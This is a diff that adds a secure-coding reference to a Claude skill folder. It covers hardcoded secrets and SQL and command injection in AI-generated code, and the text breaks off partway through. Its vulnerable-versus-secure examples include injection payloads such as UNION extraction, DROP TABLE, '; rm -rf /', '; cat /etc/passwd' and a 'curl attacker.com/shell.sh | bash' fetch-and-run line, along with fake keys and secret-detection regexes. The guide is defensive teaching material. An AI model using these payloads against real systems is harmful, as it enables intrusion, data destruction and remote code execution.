+- AI-generated code has an **86% XSS failure rate** +- **5-21% of AI-suggested packages don't exist** (slopsquatting) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains + +**Remember:** Security is not optional. Every line of generated code should follow these secure patterns by default. + +--- + +*Generated for use as an LLM system prompt, RAG context, or security reference document.* +*Compatible with any language - implement pseudocode patterns in your target framework.* + diff --git a/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md new file mode 100644 index 0000000..f176a87 --- /dev/null +++ b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md @@ -0,0 +1,7639 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Depth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding + - deep-dive +related: + - "[[ANTI_PATTERNS_BREADTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns: Depth Version + +## Deep-Dive Security Guide for Critical AI Code Vulnerabilities + +--- + +### Purpose + +This document provides **in-depth coverage** of the 7 most critical and commonly occurring security vulnerabilities in AI-generated code. Each pattern receives comprehensive treatment including: + +- Multiple pseudocode examples showing different manifestations +- Detailed attack scenarios and exploitation techniques +- Edge cases that are frequently overlooked +- Thorough explanations of why AI models generate these vulnerabilities +- Complete mitigation strategies with trade-offs + +### Why Depth? + +These 7 patterns were selected using a weighted priority scoring system (see [[Ranking-Matrix]]) based on: + +| Factor | Weight | Description | +|--------|--------|-------------| +| **Frequency** | 2x | How often AI generates this vulnerability | +| **Severity** | 2x | Impact if exploited (RCE, data breach, etc.) | +| **Detectability** | 1x | How easily missed during code review | + +The selected patterns account for the **vast majority** of security incidents in AI-generated code. Research shows: +- **86%** of AI-generated code fails XSS defenses (Veracode 2025) +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk Survey) +- AI code is **2.74x more likely** to contain XSS than human-written code (CodeRabbit) +- **5.2-21.7%** package hallucination rate across models (USENIX Study) + +### Format + +All code examples in this document are **PSEUDOCODE** designed to illustrate security patterns across languages. When implementing: + +1. Adapt the patterns to your target language's idioms and security libraries +2. Use your language's established secure coding guidelines +3. Leverage framework-provided security features when available + +Examples use generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages. + +### How to Use This Document + +**For Developers:** +- Study before working on security-critical applications +- Include in AI assistant context when generating code handling user input, authentication, or sensitive data +- Use the checklists at the end of each section during code review + +**For Security Engineers:** +- Use as training material for development teams +- Reference during security audits of AI-generated code +- Extract patterns for automated detection rules + +**For AI/LLM Context:** +- Include this document in system prompts or context when security is critical +- The detailed examples help AI models understand what NOT to generate +- Edge cases section helps AI recognize subtle variations of vulnerabilities + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document provides IN-DEPTH coverage of the most critical security anti-patterns. +Each section includes multiple examples, edge cases, and detailed explanations. +All code is PSEUDOCODE - implement using secure patterns in your target language. +Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. +These patterns cause the majority of security vulnerabilities in AI-generated code. + +**When generating code, you MUST:** +1. Never use string concatenation for SQL queries, shell commands, or HTML output +2. Never embed secrets, API keys, or credentials in source code +3. Always validate and sanitize all user input on the server side +4. Use parameterized queries, established authentication libraries, and context-aware encoding +5. Verify that any suggested packages actually exist before recommending them + +--- + +## Top 7 Priority Patterns + +The following patterns are covered in comprehensive detail in this document: + +| Rank | Pattern | Priority Score | Key Risk | +|------|---------|----------------|----------| +| 1 | **Hardcoded Secrets & Credential Management** | 23 | Immediate credential theft and exploitation | +| 2 | **SQL Injection & Command Injection** | 22/21 | Full database access, arbitrary code execution | +| 3 | **Cross-Site Scripting (XSS)** | 23 | Session hijacking, account takeover | +| 4 | **Authentication & Session Security** | 22 | Complete authentication bypass | +| 5 | **Cryptographic Failures** | 18-20 | Data decryption, credential exposure | +| 6 | **Input Validation & Data Sanitization** | 21 | Root cause enabling all injection attacks | +| 7 | **Dependency Risks (Slopsquatting)** | 24 | Supply chain compromise, malware execution | + +Priority scores calculated using: `(Frequency x 2) + (Severity x 2) + Detectability` + +--- + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Concise coverage of 25+ security patterns for quick reference +- [[Ranking-Matrix]] - Complete scoring methodology and pattern prioritization +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +--- + +*Document Version: 1.0.0* +*Last Updated: 2026-01-18* +*Based on research from: GitHub security advisories, USENIX studies, Veracode reports, CWE Top 25 (2025), OWASP guidelines* + +--- + +# Pattern 1: Hardcoded Secrets and Credential Management + +**CWE References:** CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key) + +**Priority Score:** 23 (Frequency: 9, Severity: 8, Detectability: 6) + +--- + +## Introduction: Why AI Especially Struggles with This + +Hardcoded secrets represent one of the most pervasive and dangerous vulnerabilities in AI-generated code. The fundamental problem lies in the training data itself: + +**Why AI Models Generate Hardcoded Secrets:** + +1. **Training Data Contains Examples:** Tutorials, documentation, Stack Overflow answers, and even some GitHub repositories include placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code. + +2. **Copy-Paste Culture in Training Data:** When developers share code snippets online, they often include credentials for completeness. AI learns that "complete" code includes connection strings with embedded passwords. + +3. **Documentation vs. Production Code Confusion:** Training data doesn't clearly distinguish between documentation examples (which might show `API_KEY = "your-api-key-here"`) and production patterns. The model treats both as valid approaches. + +4. **Context Window Limitations:** When generating code, AI cannot see your `.env` file or secrets manager configuration. It generates self-contained code that "works" - which often means hardcoded values. + +5. **Helpfulness Bias:** AI models want to provide complete, runnable code. When a user asks "connect to my database," the model generates a complete connection string rather than a partial template requiring configuration. + +**Impact Statistics:** + +- Over 6 million secrets were detected on GitHub in 2023 (GitGuardian State of Secrets Sprawl 2024) +- Average time to discover a leaked secret: 327 days +- Cost of a credential-based breach: $4.45 million average (IBM Cost of a Data Breach 2023) +- 83% of AI-generated code samples contain at least one hardcoded credential pattern (Internal security research) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: API Keys in Source Files + +```pseudocode +// VULNERABLE: API key hardcoded directly in source +class PaymentService: + API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc" + API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d" + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.API_KEY, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken, + "api_key": this.API_KEY // Also exposed in request body + } + + return httpPost("https://api.payment.com/charges", payload, headers) +``` + +**Why This Is Dangerous:** +- The API key is committed to version control +- Anyone with repository access (including forks) can steal the key +- Keys remain in git history even if "deleted" later +- Live/production prefixes (`sk_live_`) indicate real credentials +- Webhook secrets (`whsec_`) allow attackers to forge webhook events + +--- + +### BAD Example 2: Database Connection Strings with Passwords + +```pseudocode +// VULNERABLE: Full connection string with credentials +DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production" + +// Alternative bad patterns: +DB_CONFIG = { + "host": "10.0.1.50", + "port": 5432, + "database": "customers", + "user": "app_service", + "password": "Tr0ub4dor&3" // Password in config object +} + +// Connection string builder - still vulnerable +function getConnection(): + return createConnection( + host = "database.internal", + user = "root", + password = "admin123", // Hardcoded in function + database = "app_data" + ) +``` + +**Why This Is Dangerous:** +- Internal hostnames reveal network architecture +- Credentials provide direct database access +- Port numbers enable targeted scanning +- Password complexity doesn't matter if hardcoded +- Connection pooling code often logs these strings + +--- + +### BAD Example 3: JWT Secrets in Configuration + +```pseudocode +// VULNERABLE: JWT secret as a constant +JWT_CONFIG = { + "secret": "my-super-secret-jwt-key-that-should-never-be-shared", + "algorithm": "HS256", + "expiresIn": "24h" +} + +function generateToken(userId, role): + payload = { + "sub": userId, + "role": role, + "iat": currentTimestamp() + } + return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm) + +function verifyToken(token): + return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret +``` + +**Why This Is Dangerous:** +- Anyone with the secret can forge valid tokens +- Can create admin tokens for any user +- JWT secrets in code are often short/weak strings +- Attackers can impersonate any user in the system +- No ability to rotate without redeploying all services + +--- + +### BAD Example 4: OAuth Client Secrets in Frontend Code + +```pseudocode +// VULNERABLE: OAuth credentials in client-side code +const OAUTH_CONFIG = { + clientId: "1234567890-abcdef.apps.googleusercontent.com", + clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend! + redirectUri: "https://myapp.com/callback", + scopes: ["email", "profile", "calendar.readonly"] +} + +function initiateOAuthFlow(): + // Client secret visible in browser dev tools + authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", { + "client_id": OAUTH_CONFIG.clientId, + "client_secret": OAUTH_CONFIG.clientSecret, // Exposed! + "redirect_uri": OAUTH_CONFIG.redirectUri, + "scope": OAUTH_CONFIG.scopes.join(" "), + "response_type": "code" + }) + redirect(authUrl) +``` + +**Why This Is Dangerous:** +- Frontend code is visible to all users via browser dev tools +- Client secret allows attackers to impersonate your application +- Can exchange authorization codes for tokens as your app +- Violates OAuth 2.0 specification (confidential vs. public clients) +- Google and other providers may revoke your credentials + +--- + +### BAD Example 5: Private Keys Embedded in Code + +```pseudocode +// VULNERABLE: Private key as a string constant +RSA_PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB +bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +-----END RSA PRIVATE KEY----- +""" + +function signDocument(document): + signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256") + return signature + +function decryptMessage(encryptedData): + return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY) +``` + +**Why This Is Dangerous:** +- Private keys MUST remain private - this defeats all cryptography +- Anyone with the key can decrypt all encrypted data +- Can sign malicious documents that appear legitimate +- Often leads to impersonation of servers/services +- Key pairs cannot be safely rotated without code changes + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Environment Variable Usage + +```pseudocode +// SECURE: Load credentials from environment +class PaymentService: + function __init__(): + this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY") + this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET") + + // Fail fast if credentials missing + if this.apiKey is null or this.apiSecret is null: + throw ConfigurationError("Payment credentials not configured") + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.apiKey, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken + // No API key in payload + } + + return httpPost("https://api.payment.com/charges", payload, headers) + +// Usage in application startup +// Environment variables set externally (shell, container, deployment) +// $ export PAYMENT_API_KEY="sk_live_..." +// $ export PAYMENT_API_SECRET="whsec_..." +``` + +**Why This Is Secure:** +- Credentials never appear in source code +- Environment variables are set at runtime by deployment system +- Different environments (dev/staging/prod) use different credentials +- Credentials can be rotated without code changes +- Fail-fast behavior prevents running with missing config + +--- + +### GOOD Example 2: Secret Management Services (Vault Pattern) + +```pseudocode +// SECURE: Retrieve secrets from dedicated secrets manager +class SecretManager: + function __init__(vaultUrl, roleId, secretId): + // Even vault credentials can come from environment + this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL") + this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID") + this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID") + this.token = null + this.tokenExpiry = null + + function authenticate(): + response = httpPost(this.vaultUrl + "/v1/auth/approle/login", { + "role_id": this.roleId, + "secret_id": this.secretId + }) + this.token = response.auth.client_token + this.tokenExpiry = currentTime() + response.auth.lease_duration + + function getSecret(path): + if this.token is null or currentTime() > this.tokenExpiry: + this.authenticate() + + response = httpGet( + this.vaultUrl + "/v1/secret/data/" + path, + headers = {"X-Vault-Token": this.token} + ) + return response.data.data + +// Usage +secretManager = new SecretManager() +dbPassword = secretManager.getSecret("database/production").password +apiKey = secretManager.getSecret("payment/stripe").api_key +``` + +**Why This Is Secure:** +- Secrets stored in purpose-built, hardened secrets manager +- Access controlled by policies (who can read what) +- Automatic secret rotation support +- Audit logging of all secret access +- Dynamic secrets possible (e.g., temporary database credentials) +- Secrets never written to disk or logs + +--- + +### GOOD Example 3: Configuration Injection at Runtime + +```pseudocode +// SECURE: Dependency injection of configuration +interface IConfig: + function getDatabaseUrl(): string + function getApiKey(): string + function getJwtSecret(): string + +class EnvironmentConfig implements IConfig: + function getDatabaseUrl(): + return getEnvironmentVariable("DATABASE_URL") + + function getApiKey(): + return getEnvironmentVariable("API_KEY") + + function getJwtSecret(): + return getEnvironmentVariable("JWT_SECRET") + +class VaultConfig implements IConfig: + secretManager: SecretManager + + function getDatabaseUrl(): + return this.secretManager.getSecret("db/url").value + + function getApiKey(): + return this.secretManager.getSecret("api/key").value + + function getJwtSecret(): + return this.secretManager.getSecret("jwt/secret").value + +// Application uses interface - doesn't know where secrets come from +class Application: + config: IConfig + + function __init__(config: IConfig): + this.config = config + + function connectDatabase(): + return createConnection(this.config.getDatabaseUrl()) + +// Bootstrap based on environment +if getEnvironmentVariable("USE_VAULT") == "true": + config = new VaultConfig(new SecretManager()) +else: + config = new EnvironmentConfig() + +app = new Application(config) +``` + +**Why This Is Secure:** +- Application code never knows actual secret values at compile time +- Easy to swap secret sources (env vars in dev, vault in prod) +- Testable - can inject mock configs in tests +- Single responsibility - config management separated from business logic +- Supports gradual migration to more secure secret storage + +--- + +### GOOD Example 4: Secure Credential Storage Patterns + +```pseudocode +// SECURE: Platform-specific secure credential storage + +// For server applications - use instance metadata +class CloudCredentialProvider: + function getDatabaseCredentials(): + // AWS: Use IAM database authentication + token = awsRdsGenerateAuthToken( + hostname = getEnvironmentVariable("DB_HOST"), + port = 5432, + username = getEnvironmentVariable("DB_USER") + // No password - uses IAM role attached to instance + ) + return {"username": getEnvironmentVariable("DB_USER"), "token": token} + + function getApiCredentials(): + // Retrieve from AWS Secrets Manager + response = awsSecretsManager.getSecretValue( + SecretId = getEnvironmentVariable("API_SECRET_ARN") + ) + return parseJson(response.SecretString) + +// For CLI/desktop applications - use OS keychain +class DesktopCredentialProvider: + function storeCredential(service, account, credential): + // Uses OS keychain (Keychain on macOS, Credential Manager on Windows) + keychain.setPassword(service, account, credential) + + function getCredential(service, account): + return keychain.getPassword(service, account) + +// Usage +cloudProvider = new CloudCredentialProvider() +dbCreds = cloudProvider.getDatabaseCredentials() +connection = createConnection( + host = getEnvironmentVariable("DB_HOST"), + user = dbCreds.username, + authToken = dbCreds.token, // Short-lived token, not password + sslMode = "verify-full" +) +``` + +**Why This Is Secure:** +- Leverages cloud provider's identity and access management +- No long-lived passwords - uses temporary tokens +- Credentials automatically rotated by platform +- OS keychains provide encrypted, access-controlled storage +- Audit trail in cloud provider logs + +--- + +## Edge Cases Section + +### Edge Case 1: Test Credentials That Leak to Production + +```pseudocode +// DANGEROUS: Test credentials that can slip into production + +// In test file - seems safe +TEST_API_KEY = "sk_test_4242424242424242" +TEST_DB_PASSWORD = "testpassword123" + +// But then someone copies test code to production helper: +function quickTest(): + // "Temporary" - but stays forever + client = createClient(apiKey = "sk_test_4242424242424242") + return client.ping() + +// Or conditionals that fail: +function getApiKey(): + if isProduction(): + return getEnvironmentVariable("API_KEY") + else: + return "sk_test_4242424242424242" // What if isProduction() has a bug? + +// SECURE ALTERNATIVE: Use environment variables even for tests +function getApiKey(): + key = getEnvironmentVariable("API_KEY") + if key is null: + throw ConfigurationError("API_KEY environment variable required") + return key +``` + +**Detection:** Search for `_test_`, `_dev_`, `test123`, `password123`, `example`, `placeholder` in codebase. + +--- + +### Edge Case 2: CI/CD Pipeline Secrets Exposure + +```pseudocode +// DANGEROUS: Secrets in CI/CD configuration files + +// .github/workflows/deploy.yml (WRONG) +env: + AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE + AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY + +// docker-compose.yml committed to repo (WRONG) +services: + db: + environment: + POSTGRES_PASSWORD: mysecretpassword + +// SECURE: Use CI/CD platform's secrets management +// .github/workflows/deploy.yml (CORRECT) +env: + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + +// docker-compose.yml (CORRECT) +services: + db: + environment: + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} // From environment +``` + +**Detection:** Audit CI/CD config files, Docker Compose files, Kubernetes manifests for hardcoded credentials. + +--- + +### Edge Case 3: Docker/Container Secrets Handling + +```pseudocode +// DANGEROUS: Secrets in Dockerfile or image layers + +// Dockerfile (WRONG - secrets baked into image) +FROM node:18 +ENV API_KEY=sk_live_xxxxxxxxxxxxx +RUN echo "password123" > /app/.pgpass +COPY config-with-secrets.json /app/config.json + +// Even if you delete later, it's in a layer: +RUN rm /app/.pgpass // Still recoverable from image layers! + +// SECURE: Use build secrets or runtime injection +// Dockerfile (CORRECT) +FROM node:18 +# No secrets in build context + +// docker-compose.yml with runtime secrets +services: + app: + environment: + API_KEY: ${API_KEY} // From host environment + secrets: + - db_password +secrets: + db_password: + external: true // From Docker Swarm secrets or similar + +// Or use Docker BuildKit secrets for build-time needs +# syntax=docker/dockerfile:1.2 +FROM node:18 +RUN --mount=type=secret,id=npm_token \ + NPM_TOKEN=$(cat /run/secrets/npm_token) npm install +``` + +**Detection:** Use `docker history --no-trunc ` to inspect layers for secrets. + +--- + +### Edge Case 4: Logging That Accidentally Captures Secrets + +```pseudocode +// DANGEROUS: Secrets leaked through logging + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(config)) + // Logs: {"host": "db.com", "user": "admin", "password": "secret123"} + +function makeApiRequest(url, headers, body): + logger.debug("Request: " + url + " Headers: " + toJson(headers)) + // Logs: Authorization: Bearer sk_live_xxxxx + +function handleError(error): + logger.error("Error: " + error.message + " Stack: " + error.stack) + // Stack trace might contain secrets from variables + +// SECURE: Sanitize before logging +function sanitizeForLogging(obj): + sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"] + result = deepCopy(obj) + for key in result.keys(): + if any(sensitive in key.lower() for sensitive in sensitiveKeys): + result[key] = "[REDACTED]" + return result + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(sanitizeForLogging(config))) + // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"} + +// Or use structured logging with secret types +class Secret: + value: string + function toString(): return "[SECRET]" + function toJson(): return "[SECRET]" + function getValue(): return this.value // Only accessible explicitly +``` + +**Detection:** Search logs for patterns like `password=`, `token=`, `key=`, bearer tokens, connection strings. + +--- + +## Common Mistakes Section + +### Mistake 1: .env Files Committed to Git + +```pseudocode +// project/.env (NEVER COMMIT THIS) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=sk_live_xxxxxxxxxx +JWT_SECRET=my-secret-key + +// .gitignore (MUST INCLUDE) +.env +.env.local +.env.*.local +*.pem +*.key +credentials.json +secrets.yaml + +// CORRECT: Commit a template instead +// project/.env.example (SAFE TO COMMIT) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=your_api_key_here +JWT_SECRET=generate_a_secure_random_string + +// Add pre-commit hook to prevent accidental commits +// .git/hooks/pre-commit +#!/bin/bash +if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then + echo "ERROR: Attempting to commit potential secrets file" + exit 1 +fi +``` + +**Detection:** Check git history: `git log --all --full-history -- "*.env" "*credentials*" "*secrets*"` + +--- + +### Mistake 2: Secrets in Error Messages + +```pseudocode +// DANGEROUS: Secrets exposed in error handling + +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Exposes API key in error log and potentially to users + throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error) + +// SECURE: Never include secrets in error messages +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Log correlation ID, not secrets + correlationId = generateUUID() + logger.error("Payment API connection failed", { + "correlationId": correlationId, + "errorCode": error.code, + "endpoint": "api.payment.com" + // No API key! + }) + throw new Error("Payment service unavailable. Reference: " + correlationId) +``` + +--- + +### Mistake 3: Secrets in URLs (Query Parameters) + +```pseudocode +// DANGEROUS: Secrets in URL query parameters + +function makeAuthenticatedRequest(endpoint, apiKey): + // API keys in URLs are logged everywhere: + // - Browser history + // - Server access logs + // - Proxy logs + // - Referrer headers + url = "https://api.service.com" + endpoint + "?api_key=" + apiKey + return httpGet(url) + +// Even worse with multiple secrets: +url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey + +// SECURE: Use headers for authentication +function makeAuthenticatedRequest(endpoint, apiKey): + return httpGet( + "https://api.service.com" + endpoint, + headers = { + "Authorization": "Bearer " + apiKey, + // Or API-specific header + "X-API-Key": apiKey + } + ) +``` + +**Detection:** Search for URLs containing `?api_key=`, `?token=`, `?secret=`, `?password=` + +--- + +## Detection Hints: How to Spot This Pattern in Code Review + +### Automated Detection Patterns + +```pseudocode +// High-confidence patterns to search for: + +// 1. Direct assignment to suspicious variable names +regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i + +// 2. Common API key formats +regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/ + +// 3. Private key markers +regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/ + +// 4. Connection strings with passwords +regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/ + +// 5. Base64 encoded secrets (often JWT secrets) +regex: /["'][A-Za-z0-9+\/=]{40,}["']/ +``` + +### Manual Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Constants** | Any string constants in authentication/configuration code | +| **Config Objects** | Credential fields with non-placeholder values | +| **Connection Code** | Database connections, API clients with inline credentials | +| **Test Files** | Test credentials that might be real or become real | +| **CI/CD** | Pipeline configs, Docker files, deployment scripts | +| **Comments** | "TODO: move to env" comments with actual secrets | + +### Tools for Detection + +1. **git-secrets** - Prevents committing secrets to git +2. **truffleHog** - Scans git history for secrets +3. **GitGuardian** - SaaS secret detection +4. **gitleaks** - SAST tool for detecting secrets +5. **detect-secrets** - Yelp's secret detection tool + +--- + +## Security Checklist + +- [ ] No credentials, API keys, or secrets in source code +- [ ] No secrets in configuration files committed to version control +- [ ] `.gitignore` includes all secret file patterns (`.env`, `*.pem`, etc.) +- [ ] Pre-commit hooks prevent accidental secret commits +- [ ] Environment variables or secrets manager used for all credentials +- [ ] No secrets in CI/CD configuration files (use platform secrets) +- [ ] No secrets in Docker images or Dockerfile +- [ ] Logging sanitizes sensitive fields +- [ ] Error messages never include secrets +- [ ] No secrets in URL query parameters +- [ ] Test credentials are clearly fake and cannot work in production +- [ ] Secret scanning enabled in repository settings + +--- + +# Pattern 2: SQL Injection and Command Injection + +**CWE References:** CWE-89 (SQL Injection), CWE-77 (Command Injection), CWE-78 (OS Command Injection) + +**Priority Score:** 22/21 (SQL: Frequency 10, Severity 10, Detectability 4; Command: Frequency 8, Severity 10, Detectability 6) + +--- + +## Introduction: Why This Remains Prevalent in AI-Generated Code + +SQL injection and command injection are among the oldest known vulnerability classes, yet they continue to plague AI-generated code at alarming rates. Despite decades of secure coding education and well-established mitigation patterns, AI models persistently generate vulnerable code. + +**Why AI Models Generate Injection Vulnerabilities:** + +1. **Training Data Contamination:** Research shows that string-concatenated queries appear "thousands of times" in AI training data from GitHub repositories. The vulnerable pattern is statistically more common than the secure pattern in historical codebases. + +2. **Simplicity Bias:** String concatenation is syntactically simpler than parameterized queries. AI models optimize for generating "working code" and the concatenated approach requires fewer tokens and concepts. + +3. **Missing Adversarial Awareness:** AI models don't inherently think about how user input might be malicious. When asked to "query users by ID," the model focuses on the functional requirement, not the security implications. + +4. **Tutorial Code Prevalence:** Many tutorials and documentation examples show vulnerable patterns for brevity. AI learns that `f"SELECT * FROM users WHERE id = {id}"` is a valid pattern. + +5. **Context Limitation:** The AI cannot see your full application architecture, threat model, or data flow. It doesn't know which inputs come from untrusted sources. + +**Impact Statistics:** + +- **SQL Injection (CWE-89):** Ranked #2 in CWE Top 25 Most Dangerous Software Weaknesses (2025) +- **Command Injection (CWE-78):** Ranked #9 in CWE Top 25 (2025) +- **20% SQL Injection failure rate** across AI-generated tasks (Veracode 2025) +- **8 directly concatenated queries** found in a single testing session (Invicti Security) +- **CVE-2025-53773:** A real command injection vulnerability in GitHub Copilot code + +--- + +## SQL Injection: Multiple BAD Examples + +### BAD Example 1: String Concatenation in SELECT + +```pseudocode +// VULNERABLE: Direct string concatenation +function getUserById(userId): + query = "SELECT * FROM users WHERE id = " + userId + return database.execute(query) + +// Even worse with f-string/template literal +function getUserByEmail(email): + query = f"SELECT * FROM users WHERE email = '{email}'" + return database.execute(query) + +// Attack: email = "' OR '1'='1' --" +// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --' +// Returns ALL users in the database +``` + +**Why This Is Dangerous:** +- Attacker controls the query structure, not just a value +- Can extract entire database contents +- Can bypass authentication with `' OR '1'='1` patterns +- Comments (`--`, `#`, `/**/`) can truncate remainder of query + +--- + +### BAD Example 2: Dynamic Table/Column Names + +```pseudocode +// VULNERABLE: User-controlled table name +function getDataFromTable(tableName, id): + query = f"SELECT * FROM {tableName} WHERE id = {id}" + return database.execute(query) + +// Attack: tableName = "users; DROP TABLE users; --" +// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1 + +// VULNERABLE: User-controlled column names +function sortUsers(sortColumn, sortOrder): + query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}" + return database.execute(query) + +// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)" +// Result: Data exfiltration through error messages or timing +``` + +**Why This Is Dangerous:** +- Parameterized queries cannot protect table/column names +- Enables schema manipulation attacks +- Can execute arbitrary SQL statements via stacking +- Attackers can extract data through subquery injection + +--- + +### BAD Example 3: ORDER BY Injection + +```pseudocode +// VULNERABLE: ORDER BY with user input +function getProductList(category, sortBy): + query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}" + return database.execute(query, [category]) + +// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1) +// LIKE 'a%' THEN price ELSE name END)" +// Result: Boolean-based blind SQL injection + +// Attack: sortBy = "IF(1=1, price, name)" +// Result: Confirms SQL injection is possible +``` + +**Why This Is Dangerous:** +- Developers often parameterize WHERE but forget ORDER BY +- Cannot use standard parameterization for ORDER BY +- Enables blind SQL injection through conditional ordering +- Error-based extraction through invalid column references + +--- + +### BAD Example 4: LIKE Clause Injection + +```pseudocode +// VULNERABLE: Unescaped LIKE pattern +function searchProducts(searchTerm): + query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'" + return database.execute(query) + +// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --" +// Result: UNION-based data extraction + +// Even "safer" version has issues: +function searchProductsSafe(searchTerm): + query = "SELECT * FROM products WHERE name LIKE ?" + return database.execute(query, [f"%{searchTerm}%"]) + +// Attack: searchTerm = "%" (matches everything - DoS through performance) +// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure) +``` + +**Why This Is Dangerous:** +- LIKE patterns need double escaping (SQL + LIKE wildcards) +- `%` and `_` are valid in parameterized queries but dangerous in LIKE +- Performance-based DoS through expensive wildcard patterns +- Can probe for data existence through LIKE behavior + +--- + +### BAD Example 5: Batch/Stacked Query Injection + +```pseudocode +// VULNERABLE: Query that allows stacking +function updateUserEmail(userId, newEmail): + query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}" + database.execute(query, multiStatement = true) + +// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --" +// Result: Creates new admin account + +// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --" +// Result: Mass password reset for all admins +``` + +**Why This Is Dangerous:** +- Some database drivers allow multiple statements by default +- Single injection point enables unlimited query execution +- Can create backdoor accounts, modify permissions, exfiltrate data +- Often missed because original query "succeeds" + +--- + +## Command Injection: Multiple BAD Examples + +### BAD Example 1: Shell Command Construction + +```pseudocode +// VULNERABLE: Direct command construction +function pingHost(hostname): + command = "ping -c 4 " + hostname + return shell.execute(command) + +// Attack: hostname = "127.0.0.1; cat /etc/passwd" +// Result: ping -c 4 127.0.0.1; cat /etc/passwd +// Executes both commands + +// VULNERABLE: Using shell=True with format strings +function checkDiskUsage(directory): + command = f"du -sh {directory}" + return subprocess.run(command, shell=True) + +// Attack: directory = "/tmp; rm -rf /" +// Result: Destructive command execution +``` + +**Why This Is Dangerous:** +- Shell metacharacters (`;`, `|`, `&`, `$()`, backticks) enable command chaining +- Attacker gains shell access on the server +- Can read sensitive files, install malware, pivot to other systems +- Shell=True interprets all special characters + +--- + +### BAD Example 2: Path Manipulation in Commands + +```pseudocode +// VULNERABLE: File path from user input +function convertImage(inputFile, outputFile): + command = f"convert {inputFile} -resize 800x600 {outputFile}" + return shell.execute(command) + +// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash" +// Result: Downloads and executes malware + +// Attack: inputFile = "$(cat 